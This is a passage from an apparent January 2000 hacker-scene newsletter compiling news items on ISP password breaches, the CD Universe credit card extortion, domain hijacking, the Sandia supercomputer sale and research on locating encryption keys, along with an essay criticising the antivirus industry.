and several files deleted. Innercite also reported that its
service had been used to perform network scans of
computers at Sandia and Oakridge National Laboratories.

Pacific Bell went beyond issuing a simple warning,
saying that subscribers would be required to change their
passwords or face being shut out of their accounts. "For
your protection, if you have not changed your password
by January 14, 2000, Pacific Bell Internet will require that
you call in to change it in order to access your account,"
the e-mail stated.

For good reason: More than 200,000 passwords had been
stolen from the California Internet service provider, though
the police found that only 63,000 had been decrypted at
the time of arrest, said Frisby.

Pacific Bell provided a Web address where users could
change their passwords.

A Pacific Bell support technician confirmed the action
Saturday but could not provide details. No other
information has been made available on Pacific Bell's
site.

Although hack attacks on ISPs are not uncommon, it is
more rare for a service provider to require customers to
change their passwords.

So far, none of the other providers has come forward with
details about the problem.

@HWA

77.0 Virgin ISP Issues New Passwords 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by macwizard
After discovering someone attempting to break into the
email system Virgin has forced 170,000 of its 800,000
users to change their passwords. Officials claim that no
security breach happened but that someone has
attempted to break in. (If no one got in why bother to
change the passwords? This makes no sense.)

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_597000/597229.stm

Hacker scare hits Virgin Net

Security "not breached", but
passwords must be changed

Thousands of Virgin e-mail users are
being issued with new passwords
after the company found a hacker had
been attempting to tap into its
mailing system.

More than 170,000 of Virgin Net's
800,000 UK customers had their
service temporarily withdrawn at the
weekend.

A notice was posted on Virgin's
official website warning users of the
potential breach, and giving
step-by-step instructions as to how
they could change their passwords.

Individual letters were also being
sent out to inform anybody who had
not logged on since the problem was
detected.

A spokesman said on Monday: "No
actual security breach has happened,
but we discovered someone was
attempting to hack in.

"Because we were able to work out
how they were trying to do this, we
were able to isolate a maximum of
25% of our customers who might
have potentially been affected.

"Their e-mail facilities have been
temporarily switched off and we are
in the process of creating new
passwords for them.

"It is important to emphasise that, in
the event, no-one's security has
actually been breached."

The spokesman added that all those
concerned were a certain "type" of
customer, but he declined to identify
which one.

Microsoft scare

The Virgin security scare comes just
four months after Microsoft was
forced to temporarily shut down
e-mail links for 40m customers
worldwide, following a breach of the
company's Hotmail security system.

On that occasion, a group of seven
programmers calling themselves
Hackers Unite later e-mailed online
news service Wired to claim
responsibility for the breach, which
they said was intended to
demonstrate the inadequacy of
Hotmail's defences.

Virgin Net user John Holland learnt of
the potential breach when he tried to
retrieve his e-mail messages on
Sunday, and found his password was
being rejected.

He said: "For me it wasn't such a big
problem, but for some customers who
are trying to run businesses using
e-mail they could have missed out on
dozens of messages by the time they
receive their letter telling them about
the situation.

"A potential breach doesn't bother me
particularly because I don't have that
much confidential information coming
over, but clearly the fact there has
been a potential breach is a cause for
concern to some people."

@HWA

78.0 CD Universe Customer Info Compromised 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian and birgir
A Russian cyber-intruder using the alias Maxim tried to
blackmail the online vendor CD Universe in December by
threatening to release credit card data he had stolen off
the site. The extortionist said that he sent a fax to CD
Universe early in December saying "Pay me $100,000
and I'll fix your bugs and forget about your SHOP
FOREVER, or I'll sell your cards and tell about this in the
news." When CD Universe did not respond to his threats
he posted 25000 credit card details on a website and
sold the rest through chat rooms on IRC and other
underground venues.

Internetnews.com
http://www.internetnews.com/ec-news/article/0,1087,4_278091,00.html

Failed Blackmail Attempt Leads to Credit Card Theft
January 9, 2000
By Brian McWilliams
InternetNews.com Correspondent
E-Commerce News Archives

In what may be the largest credit card heist on the Internet, an
18-year-old Russian cracker claims to have stolen thousands of credit card
numbers from an online store and dispensed them to visitors of his Web
site.

Before it was taken offline early Sunday morning, the rogue site, a page
of which has been captured here, had doled out more than 25,000 stolen
card numbers. Also included with the numbers were expiration dates and
cardholder names and addresses, according to a counter on the page. With
the click of a button, visitors could launch a script that purportedly
obtained a valid credit card "directly from the biggest online shop
database," according to a message at the site.

The cracker, who goes by the nickname Maxus, claimed in an e-mail to
InternetNews.com to have breached the security of CDuniverse.com, an
online music store operated by eUniverse, Inc. of Wallingford, Conn. Maxus
said he had defeated a popular credit card processing application called
ICVerify, from CyberCash (CYCH) and obtained a database containing more
than 300,000 customer records from CDuniverse.

As proof of his exploit, Maxus e-mailed a file to InternetNews containing
dozens of user names and passwords for accessing customer order status
information at CDuniverse.

One of the victims, Greg Wilson of Binghamton, N.Y., confirmed that he had
shopped at the online music store over a year ago. According to Wilson, he
was contacted by his credit card company's fraud division last week after
someone had attempted to make an authorized charge to his card.

Another victim, Charles Vance of Marietta, Ga. said he had purchased CDs
from the company in the past, but had recently cancelled the card on file
for unrelated personal reasons.

Cybercash officials disputed the hackers report, saying their IC Verify
product was not at issue.

"CyberCash's ICVERIFY product is a pc-based payment system, not a
Web-enabled product and is not being used by CD Universe on its Web site.
Therefore, the credit card information cited in recent coverage could not
have come from ICVERIFY.

"Since we're not involved in this, any other questions should be addressed
to law enforcement officials or CD Universe, as it is not appropriate to
comment further due to the legalities surrounding this issue."

Maxus said that he decided to set up the site, titled Maxus Credit Cards
Datapipe, and to give away the stolen customer data after officials at
CDuniverse failed to pay him $100,000 to keep quiet about the security
hole. Maxus claims the company agreed to the payment last month, but
subsequently balked at initiating a wire transfer to a secret bank account
because it might be noticed by auditors. After a week passed with no
further contact from the company, Maxus said he put up his site and
announced its presence Dec. 25th on an Internet Relay Chat group devoted
to stolen credit cards.

Soon after launching his site, Maxus said it became so popular with credit
card thieves that he had to implement a cap to limit visitors to one
stolen card at a time.

The Internet service provider which hosted the Maxus site, Lightrealm
Inc., of Kirkland, Wa, took the Maxus site down sometime early Sunday
morning. Lightrealm was acquired by Micron Electronics (MUEI) last
October.

According to Elias Levy, chief technology officer of Internet security
information firm SecurityFocus.com, which first publicized the existence
of the Maxus site, the incident "is very disturbing. It realizes the fears
people have about online commerce." But Levy pointed out that because card
holders are usually only responsible for first $50 in fraudulent charges,
the real danger in Internet credit card fraud falls on online merchants
and credit card companies.

"The Internet is not more dangerous for consumers. It allows a criminal to
break into a single site and obtain not one credit card, but possibly a
database of all credit cards of that site's customers," Levy said.

Apprehending Maxus will not be easy, said Richard M. Smith, an online
security expert in Brookline, Mass., who helped federal agents track down
the author of the Melissa virus, David L. Smith. Maxus appears to move
about online using stolen accounts and relays his email through other
sites to conceal the originating Internet protocol address, said Smith.

"It's possible he could have slipped up somewhere along the way, but I
think he's pretty free and clear and it's near zero that they will catch
him," Smith said.

A guest book at the Maxus site contained dozens of entries from visitors,
many of them in Russian.

According to BizRate, a service which collects feedback from online
shoppers, CD Universe rates highly overall with excellent customer
satisfaction scores for nearly all dimensions of its service.

@HWA

79.0 Northwest Notifies Customers of Security Breech 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
After routine maintenance on the NorthWest Airlines
web site administrators forgot to turn the security
systems back on. NorthWest has said that it does not
know how long customer information was vulnerable or if
personal information such as credit card numbers where
compromised. The company said that it is taking the
unprecedented step of notifying all effected customers
anyway.

Associated Press - via Northern light
http://library.northernlight.com/ED20000107690000013.html?cb=0&dx=1006&sc=0#doc

Story Filed: Friday, January 07, 2000 8:23 PM EST

EAGAN, Minn. (AP) -- Northwest Airlines is alerting customers who recently
made purchases on its Frequent Flier Web site that their credit card numbers
and personal information were unprotected because of a programming glitch.

Northwest spokesman Jon Austin said the risk of hackers getting the information
is small, but one the airline is taking seriously.

``We want to be able to take care of this ourselves because it is a problem we
created and one we want to help resolve,'' he said.

The problem arose when a computer programmer doing maintenance on the site put
the system back on line, but forgot to restore the security system.

When a customer didn't see a small ``lock'' icon as he placed his order in
mid-December, he notified the carrier that the information was not secure.

Austin did not say exactly how long the site was unsecured or how many passengers
were affected. Northwest is now notifying passengers who made purchases at the
time about the security lapse.

@HWA

80.0 Parse Issues Statement About Cancellation 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Elyn
The unexpected cancellation of ParseTV last week by
online TV broadcaster Pseudo has left a lot of people
wondering what the hell happened. Host of the show
Elyn Wollensky has released a brief statement hopefully
explaining the situation.

Statement from ParseTV Host Parse Issues Statement About Cancellation
http://www.hackernews.com/press/parsetv.html

Date: 1/8/00 7:28 PM
Received: 1/8/00 8:07 PM
From: Ewidgb@xxxx.com
To: contact@hackernews.com

Dear HNN,
After several e-mails, phone calls, & comments at last
nights 2600 meeting, I think I need to issue a brief
statement regarding Parse and requesting that no one
deface Pseudo or try to do anything to their archives. I
waited for Pseudo to issue a statement, but I guess they
haven't, so here it is:

The hosts of ParseTV are grateful for all the notes and
calls regarding the show & concern for our future. While
we have not been informed of the official reason for
Pseudo's cancellation of the ParseTV channel, we are
grateful to Pseudo for the opportunities that they offered
us.

We are currently discussing potential opportunities with
several other webcasters and cable networks, which
would allow us to take the show to a new level both in
quality and the content offered.

Because of these discussions, we request that no one act
out in a rash way. Particularly by defacing the Pseudo site
or by attempting to attack their archives or databases.
Any defacement, denial of service attack, or database
tampering would only harm our chances of being acquired
by a respected news or webcast service. And, while it is
great to be able to come to the negotiation table with an
existing loyal and supportive audience base, it is equally
important that our audience be seen as reliable and
trustworthy.

Have no fear that we are trying to make a move that will
benefit the integrity of the show, and allow us to continue
to grow the quality and content that we worked so hard
to pull together.

Once again, we would like to thank everyone who has
written and called for your continued support and
encouragement. If you would like to reach us directly, you
can contact Elyn at solaar@hushmail.com & Mike at
editor@aviary-mag.com.

Elyn Wollensky & Mike Hudak

Thanks

@HWA

81.0 HACK.CO.ZA DoS attack causes ISP to remove site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The well known hack.co.za website has been under attack for several days
forcing the ISP to take down the site's connectivity. There is no word
yet as to why the site remains down after the DoS attacks stopped or who
was behind the attacks but gov-boi is now looking for a new provider to
host the site.

If you can offer hosting (free) for this premiere security site, please
contact us and we'll get you in contact with gov-boi. Hopefully things
will work out and the site will be back online shortly. - Ed

@HWA

82.0 Comments on Linux Security 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by white vampire
Jon Lasser began the Bastille Linux Project in order to
harden the security of Red Hat Linux, the distribution he
uses at work. In the process, he began looking at the
other distributions to see how they handle security
updates, and he was not at all happy with what he
found. In a Freshmeat editorial, he shares his concerns
and explains why it matters to you even if you do all
your security monitoring for yourself.

Freshmeat
http://freshmeat.net/news/2000/01/08/947393940.html

@HWA

83.0 PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Overlord
Free webspace provider Fortunecity.com has axed plans
to take the Piratecity.com community to court for so
called use of FortuneCity's Proprietary Interests.
PirateCity is a free web host provider to the
underground community. It is rumored that continuous
attacks on their website by pro-PirateCity supporters
was too much to make the action worthwhile. PirateCity
thanks all those who supported their cause but say they
never promoted malicious cyber activity as a means to
get their message across.

PirateCity
http://www.piratecity.com/news.htm

@HWA

84.0 Taiwan Claims 1000 Viruses In Arsenal 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Taiwanese Defense Ministry official Lin Chin-ching has
been quoted as saying that Taiwan has 1000 viruses in
its arsenal in preparation for a cyber war with China.
(While there is no evidence to prove or disprove this
statement it sounds like propaganda to me.)

Bloomberg
http://quote.bloomberg.com/fgcgi.cgi?ptitle=U.S.%20Economy&s1=blk&tp=ad_topright_econ&T=markets_fgcgi_content99.ht&s2=blk&bt=blk&s=27ac19370aa3ca9a7103812a68e1d077

Economy and Politics
Sat, 15 Jan 2000, 8:51am EST

Taiwan Has 1,000 Computer Viruses to Fight Cyber War With China, AFP
Says
By Peter Harmsen

Taipei, Jan. 9 (Bloomberg) -- Taiwan's military is preparing
for cyber warfare with China and has developed about 1,000
computer viruses for that purpose, Agence France-Presse reported,
quoting the Liberty Times. ``Should the People's Liberation Army
launch electronics warfare against Taiwan, the military, armed
with about 1,000 computer viruses, would be able to fight back,''
the paper quoted Defense Ministry official Lin Chin-ching as
saying, according to AFP. One of the scenarios considered by
Taiwan's Defense Ministry is for China to invade Taiwan's
computer systems and alter the outcome of the March presidential
polls, AFP said.

After tensions between Taiwan and China rose in the middle
of last year, cyberspace was one of the main scenes of hostility,
with Internet users trading insults and hackers intruding on
government Web sites.

(Agence France-Presse, 1/9)

@HWA

85.0 Reno Announces LawNet 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The US attorney general, Janet Reno, has proposed the
creation of a national computer crime-fighting network
dubbed LawNet. The network would consist of a new
nationwide computer system for information sharing and
the creation of new forensic computer labs around the
country. The network would work with law enforcement
agencies on the federal state and local level.

LA Times
http://www.latimes.com/business/cutting/20000110/t000002956.html

Associated Press - via MSNBC
http://www.msnbc.com/news/355783.asp

Reno to Discuss Plan to Bolster Efforts Against Cyber-Crime

Law: The attorney general is expected to outline a proposal that
includes a nationwide network that would facilitate investigations.

By GREG MILLER, Times Staff Writer

U.S. Atty. Gen. Janet Reno is expected today to propose the creation
of a national computer crime-fighting network designed to enable
swift cooperation among law enforcement agencies on crimes that often
cross multiple jurisdictions and unfold in a matter of minutes,
according to officials familiar with a speech Reno is scheduled to
make at a Palo Alto conference. The network is part of a series of
initiatives Reno is expected to outline at a time when law
enforcement agencies across the country are struggling to keep up
with technology's expanding role as a tool of crime. The initiatives
would overhaul the way law enforcement agencies at every level work
together to investigate crimes involving computers. One federal
official who spoke on condition of anonymity said that coordination
among agencies these days is often hit and miss at best. Reno's
proposals also will include the establishment of a new nationwide
computer system for sharing investigative information and the
creation of new forensic computer labs around the country that would
combine personnel from federal, state and local law enforcement
agencies. She is not expected to provide much information on how such
measures might be financed when she unveils them in a keynote speech
today before members of the National Assn. of Attorneys General. The
group is convening in Silicon Valley to discuss the impact of the
Internet and technology on law enforcement. Many details of Reno's
proposals remain unclear, including specifically how the plans would
be funded. But officials familiar with the plans say they are a high
priority for the Justice Department and the Clinton administration.
In fact, Reno's proposals come in the wake of a series of
computer-related initiatives the White House has announced in recent
months. Last week, for example, President Clinton proposed allocating
$91 million to develop new programs to protect the nation's computer
networks from intrusion by hackers. Part of that funding would go
toward the creation of a Federal Cyber Service, analogous to the
R.O.T.C., that would enlist college computer science students to help
the government fend off computer attacks by terrorists or foreign
governments. But while the threat of cyber-terrorism has so far been
more theoretical than actual, Reno's proposals are aimed at shoring
up law enforcement's ability to combat everyday crime in the
Information Age. The centerpiece of Reno's plan is decidedly low tech
and relatively low cost because it involves no new computer systems
or technical infrastructure. Rather, it calls for the creation of a
network of specially trained computer crime coordinators at law
enforcement agencies around the country. Designated coordinators
would be available at a moment's notice and would be experts in the
nuances of computer-related investigations. As an example, officials
said such coordinators would be equipped to move quickly in serving
court orders to obtain account information or request traces on calls
or data transmission from local telecommunications companies and
Internet service providers. That sort of coordination is increasingly
commonplace in large metropolitan areas, such as Los Angeles, where
the Police Department and other local agencies operate special
high-tech crime units. But federal officials say smaller cities and
agencies are far less likely to be equipped to assist in a computer
investigation on short notice and often merely refer such requests
for help to federal authorities. The second of Reno's proposals is
more complicated, costly and uncertain. She is expected to call for a
secure national computer system in which law enforcement agencies can
both supply and access information on ongoing investigations of
crimes ranging from hacking attacks to drug trafficking. The federal
government has already created a network called the National Crime
Information Center, which allows state and local authorities to tap
federal crime databases. But that network does not allow state and
local authorities to contribute information, and it has come under
heavy criticism because it suffered numerous delays and cost millions
of dollars more than initial estimates. The third major proposal
expected from Reno involves the creation of jointly operated forensic
computer crime labs around the country. Such labs would be staffed by
computer experts trained in analyzing hard drives and other computer
systems for digital evidence that is increasingly crucial in
prosecuting white-collar crimes from hacking to health-care fraud.
The FBI already operates such labs in most major metropolitan areas
around the country. But officials said that those labs are
overwhelmed by existing caseloads and that few state and local
agencies have comparable facilities. Reno's proposal would replicate
a unique arrangement in San Diego, where a forensic computer lab
operates using personnel and resources from the FBI and the Secret
Service as well as the San Diego District Attorney's Office and
Police Department. Officials acknowledged that such a plan would
require federal funding but declined to discuss how Reno planned to
pay for the project
except to say that is under consideration for the Justice Department's
upcoming budget proposal.

@HWA

86.0 Domains Redirected 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The compromised password of an administrator at a New
Jersey ISP, HighSpeedNet, allowed a malicious intruder
to change the domain entries of several sites including
Emory University, Exodus Communications, Colorado
University, Corecomm and Dreamcast. Most sites
restored service within a few hours.

C|Net
http://news.cnet.com/news/0-1005-200-1519750.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j

Widespread domain hack hits Emory University, others
By Patricia Jacobus
Staff Writer, CNET News.com
January 11, 2000, 4:00 a.m. PT

A hacker hijacked several Internet addresses over the weekend, confusing
computer users and inconveniencing the organizations involved.

All but two of the domain names, which were redirected to another company's
Web site, were restored by yesterday afternoon. But some organizations,
like Emory University in Atlanta, were still struggling to get their Web
sites back in order, they said.

Somehow, someone tapped into the universal registry operated by Network
Solutions (NSI) and changed at least nine Net addresses redirecting users
to the Web site of a New Jersey company called HighSpeedNet.net, said Jan
Gleason, vice president of communications at Emory University.

NSI representatives could not immediately be reached for comment.

The operator of HighSpeedNet, a 19-year-old software technician, explained
he was not the culprit, but a victim.

"There's no reason for anyone to believe me," Ralph
Hughes said in an interview yesterday afternoon.
"But somebody got a hold of my password and
authorized all these changes. There really wasn't
anything I could do about it."

This is the third time in a month that there have
been major problems surrounding domain names.

In late December, consumers complained that the
universal software used to reserve Net names
occasionally went on the blink, causing some people
to lose out on a sought-after name.

And last week, several registrars had to recall
hundreds of domain names sold over the past few
months with trailing or leading hyphens in the
addresses. The hyphens were not allowable, but
somehow NSI's registry accepted the domains anyway.

Other companies affected by the hacker's weekend
work included Exodus Communications, Colorado
University, Corecomm and Dreamcast.

Hughes said he first learned of the problem Saturday
morning when he reported to work and checked his
email.

"There was a notice that all these domains were transferred to me," he
said, somewhat exasperated.

Shortly thereafter he discovered that the high traffic being redirected to
HighSpeedNet was causing problems for his viewers, who couldn't get into
chat rooms or click around the Web site.

Hughes said he quickly called all the companies affected in an attempt to
repair the problem.

The universities had to wait until today to get help. NSI provides service
for ".edu" domains only during the week.

For Emory University, that meant faculty members and administrators
couldn't use email, and prospective students weren't able to check out the
school's site.

"We're not in classes right now, so for us it was just a few minor
headaches," Gleason said. "But we're told it's going to take until tomorrow
to fix the problem, which has been going on for 60 hours now. On the
Internet 60 hours is a lifetime."

The incident has sparked a renewed interest by college advocates to demand
better service for ".edu" domains. Universities don't pay a fee for the
Internet addresses and in turn don't get seven-day-a-week service.

Last year, a group called Educause, which represents college network
administrators, vowed to jump into the Internet deregulation game, hoping
to gain control of the names reserved for universities.

Their efforts are still in the works.

@HWA

87.0 Report on SuperComputer Sale to China Released 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
An Energy Department report on the sale of a
decommissioned supercomputer (Intel Paragon XPS) by
Sandia National Laboratories to a Chinese national has
been released. The sale, in 1998, worried officials that
the machine could end up in China. The machine was
later repurchased for three times the original sale price.
The report indicates that security was not compromised
but does paint a disturbing picture of how sensitive
equipment was handled at the lab.

Washington Post
http://www.washingtonpost.com/wp-srv/WPcap/2000-01/09/047r-010900-idx.html

HNN Archive for August 2, 1999
http://www.hackernews.com/arch.html?080299

Defense Lab's Computer Sale Risked
Security, Probe Finds

By Bradley Graham
Washington Post Staff Writer
Sunday, January 9, 2000; Page A14

One of the nation's leading defense laboratories sold one of the world's
100 fastest computers at a bargain-basement price to a U.S. firm
controlled by a Chinese citizen in late 1998.

Ten months later, fearing that the supercomputer's parts could end up in
China, lab officials hurriedly repurchased the machine at nearly three times
the sale price.

In a detailed report released last week, the Energy Department's inspector
general faults officials at Sandia National Laboratories for ignoring risks to
national security in the botched deal. While finding no evidence that
security actually was damaged, the report paints a damning picture of the
lab's handling of a piece of advanced technology used during the
mid-1990s in highly classified nuclear weapons research.

The new report concludes that the sale took place without the knowledge
of senior lab and administration officials. Those involved in the deal treated
the computer as just another item of surplus equipment, neglected to apply
controls required for potential exports and failed to review operating
manuals and data storage disks sent with the computer, the report says.

Soon after the sale, the report reveals, lab officials dismissed suspicions
voiced by the computer's manufacturer, Intel Corp., that the buyer might
transfer some parts to China. Only when press reports last summer called
attention to the sale and highlighted the buyer's Chinese citizenship did
Sandia officials reclaim the computer.

"We found the process used to sell the computer to be seriously flawed,"
said Gregory Friedman, the Energy Department's inspector general, in a
summary of the 24-page report.

"If the sale were done today, at a time we're sensitized to espionage, it
would be an act of stupidity," responded Pace VanDevender, Sandia's
chief spokesman, in a telephone interview. "But at the time, China was a
friend, with 'most favored nation' status. And senior U.S. officials were
visiting there, normalizing our relationship."

Nevertheless, the episode has deeply embarrassed Sandia and
compounded concerns about lax security at the national laboratories.
News of the sale coincided in the past year with a congressional probe of
China's alleged theft of U.S. nuclear secrets as well as criminal charges
against Wen Ho Lee, a former physicist at Los Alamos National
Laboratory who is accused of mishandling classified data.

Sandia officials, while acknowledging some mistakes, insist that national
security was never jeopardized by the round-trip journey of the Paragon
XPS supercomputer from Sandia to a California warehouse and back
again. They note that the machine was sold without its classified parts and
would have been expensive and inefficient to operate. They also say the
buyer had led them to believe he wanted to refurbish the computer and
resell it to an Internet service provider in California.

"He showed up in a flatbed truck to move the computer," VanDevender
said. "This was consistent with his role as an entrepreneur looking to make
a deal. Had he really been tasked by China to purchase the computer, he
would have been instructed to handle it differently, since it's fragile and not
something you bang around."

But other government experts say the Paragon could have been
reassembled and made operational again. Citing government and industry
experts, the Energy Department report says it "could still be useful in a
weapons program."

"For the most part, Sandia treated the Paragon as if it were any other piece
of excess property," the report says, "when in fact, it was a supercomputer
that had been used in the department's nuclear weapons program."

Sandia originally purchased the computer for $9.56 million in 1993 and
used it to model nuclear weapons accidents and simulate the impact of
nuclear shock waves on weapons components, among other functions.

After five years, lab officials deemed the Paragon obsolete. By then,
Sandia had purchased another supercomputer 15 times more powerful.
Lab officials also were concerned about the older computer's reliability and
were eager to avoid its estimated $3 million annual maintenance and
operating costs.

Unable to interest any other U.S. government agencies in the system,
Sandia sold it in September 1998 for $31,000 to EHI Group USA in
Cupertino, Calif. A principal in the company, Korber Jiang, is a Chinese
national, although Sandia officials say they were unaware of that at the
time.

A senior Energy Department official described EHI as a small business
dealing in electronic products and other items and selling mostly to the local
community.

Last July, Sandia bought the computer back from EHI for $89,000. Lab
officials agreed to the higher price to allow Jiang "to preserve face with his
joint-venture backers in China" and cover the cost of having stored the
computer for 10 months, according to the report.

If restored to operation, the report says, the Paragon computer would be
one of the 100 fastest in the world, with a capability of 190,000 million
theoretical operations per second (MTOPS). At the time of the sale,
Commerce Department regulations imposed export constraints on
computers exceeding 2,000 MTOPS.

Nonetheless, Sandia officials never treated the computer as a potential
national security risk. The lab's only risk assessment, the report says,
consisted of Sandia's "property administrator" asking an unidentified lab
employee in early 1998 whether another supercomputer was a "high-risk"
item.

"The property administrator was told that the other supercomputer was not
high-risk, but was export controlled due to its speed," the report says.
"The property administrator said that he applied this information to the
Paragon and determined that the Paragon was not a high-risk item."

Sandia officials also overlooked the shipment of 34 manuals and guides,
which were buried beneath computer cables in boxes sent with the
computer. And they neglected to screen 134 unclassified data storage
disks.

"While there is currently no evidence that the 'unclassified disks' contained
classified information relating to Sandia's classified operations of the
Paragon," the report says, "Sandia did not know the exact nature of the
information contained on the 'unclassified' disks at the time the Paragon
was sold. In fact, no one at Sandia attempted to make the determination."

Grilled about the sale by a House Armed Services subcommittee last
October, C. Paul Robinson, Sandia's director, said that had he known of
Jiang's nationality, he would have sought to prevent the sale. But he said
civil rights laws limit a seller's ability to refuse to deal with a legitimate U.S.
firm on the basis of the citizenship of the firm's officers. He recommended
new regulations banning the sale of export-controlled items to U.S.
companies run by citizens of adversarial nations.

Since recovering the Paragon computer, Sandia officials say, the lab has
revised its procedures for disposing of equipment and begun training
employees to better identify sensitive sale items.

@HWA

88.0 Kevin Mitnick Interview 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan
Kevin Mitnick is scheduled to give and interview to 60
Minutes reporters today. The interview should air on 60
Minutes on or about January 23, 2000. Kevin is
scheduled to be released from Lompoc Prison on January
21st, 2000. It is felt that Kevin will discuss what he did,
and the government's actions. It is thought that since
Kevin no longer has a trial hanging over his heard he will
be a little more revealing than in the past.

60 Minutes
http://www.cbs.com/now/section/0,1636,3415-311,00.shtml
(* Didn't see anything to do with Mitnick in this url? - Ed)

@HWA

89.0 Encryption Keys Easily Found On Systems 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
Researchers at nCipher in Cambridge, England have
found a way to easily find encryption keys on target
systems. The technology centers on this: There is a
general assumption that encryption keys will be
impossible to find because they are buried in servers
crowded with similar strings of code. What the
researchers discovered, however, is that encryption
keys are more random than other data stored in servers.
To find the encryption key, one need only search for
abnormally random data.

ZD Net
http://www.zdnet.com/intweek/stories/news/0,4164,2417628,00.html

Encryption Keys Vulnerable,
Researchers Warn
By Doug Brown, Inter@ctive Week
January 5, 2000 5:38 PM ET

Researchers at an English company announced
Wednesday that they found a way to pluck from Web
servers "keys" that provide access to private data stored
on servers, such as credit-card numbers.

The revelation that hackers can break into servers and
steal encryption keys could have repercussions
throughout the electronic commerce landscape.
Companies have long struggled with ensuring customers'
privacy in the face of increasing hacker ingenuity, but
encryption keys were generally believed to dwell in a
safe haven.

"It's a pretty big deal," said Tom Hopcroft, president of
the Massachusetts Electronic Commerce Association.
"Currently, people feel that their keys for credit-card
numbers are pretty safe, because they are on a server
with a lot of other data, where they might be hard to
find."

In light of the discovery that encryption keys are readily
open to attack, companies must find ways to prevent
their discovery, Hopcroft added. "The loss of consumer
confidence could cripple the phenomenal growth of
electronic commerce," he said. "A lot of that [growth] is
because we don't have a fear of giving out our credit-card
numbers over the Internet."

Alex Van Someren, president of nCipher in Cambridge,
England, said the discovery of a method for retrieving
encryption keys revolves around research conducted by
his brother Nicko, chief technology officer and co-founder
of nCipher, and Adi Shamir of the Weizmann Institute in
Israel, co-inventor of the RSA encryption system, the
base for much current encryption technology.

The researchers published their initial findings at the
Financial Cryptography '99 conference in February 1999.
The research, Alex Van Someren said, laid a theoretical

Now, he said, the researchers have demonstrated a
concrete method for finding and stealing encryption keys
from servers.

The technology centers on this: There is a general
assumption that encryption keys will be impossible to
find because they are buried in servers crowded with
similar strings of code. What the researchers
discovered, however, is that encryption keys are more
random than other data stored in servers. To find the
encryption key, one need only search for abnormally
random data.

Hopcroft compared the method to classic Cold War
tactics.

"The United States developed quieter and quieter
submarines, but they made them so quiet it was quieter
than the ambient noise around them," he said. "So the
Soviets could search for quiet spots."

The problem could be particularly nettlesome for smaller
companies, because many of them run their Web
businesses on servers shared by other companies.

All a hacker would have to do, Hopcroft said, is set up
an account with an Internet service provider hosting a
company's Web site, "go into that server and root around
looking for the keys of other companies. With [the key]
there is no way for me to be distinguished from a
legitimate business owner."

Van Someren said nCipher decided to go after
encryption keys because "we make products that
redress these problems." The company offers a
hardware solution to the problem of encryption-key
security.

Van Someren noted that it's possible that others -
hackers, in particular - already have discovered the path
to the once-hidden encryption keys.

"We haven't seen any evidence of real attacks occurring,
but if it were to occur, there would not necessarily be
any trace left behind that it had occurred," he said.

Peter Neumann, a computer security researcher at SRI
International in Menlo Park, Calif., said the discovery
stands as just one more demonstration of "how flaky our
infrastructure is."

"Every operating system can be broken into one way or
another, and the servers aren't an exception," he added.
"We need a great deal more security than we have at the
moment as we enter into electronic commerce. And the
bottom line is we should be a little bit more cautious
about depending upon cryptography as the answer to all
of our problems, because it isn't. It's very difficult to
embed it properly into a system."

Bruce Schneier, a world-renowned cryptography expert
and chief technology officer at Counterpane Internet
Security in San Jose, echoed Neumann.

"Security vulnerabilities are inevitable, because of the
complexity of the product, the rush to market, all of
these things," he said. "So the vulnerabilities, we see
them every week. The only solution is to build security
processes that take into account the fallibility of the
products."

Of the nCipher discovery, he said: "Let's say we fix this
one. We're not magically better. We've fixed one little
thing."

@HWA

90.0 Buffer Overflow: Reform the AV Industry 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Render Man
How bad is the AV Industry? Does it need to be
reformed? Does scanning for one piece of software
because of the intent of the author and not the user
make sense? How about scanning for legitimate security
tools simply because they have extreme power when
used by malicous people?

Buffer Overflow
http://www.hackernews.com/bufferoverflow/

Reform the A/V Industry!

Renderman, 01/13/00
Www.Hackcanada.com
RenderMan@Hackcanada.com

The year was 1988 and a young graduate student named
Robert Morris Jr. released a self replicating program onto
the internet to show off various holes in system security.
Unfortunately when playing with fire, you can get burned.
The Program was supposed to only copy itself to a system
once, but due to some errors in calculating the probable
infection rate, the program replicated itself multiple times
on each host on the network causing ever increasing
system loads and eventual system crashes. This was the
first internet panic over a "worm", but would not be the
last. In future years, the Michaelangelo virus, Win95.CIH,
and Melissa to name a few, spread fear rapidly across the
net. Anti-Virus company media men following in hot pursuit
of each.

It used to be easy for the Anti-Virus vendors. Anything
that was self replicating and/or caused damage was a
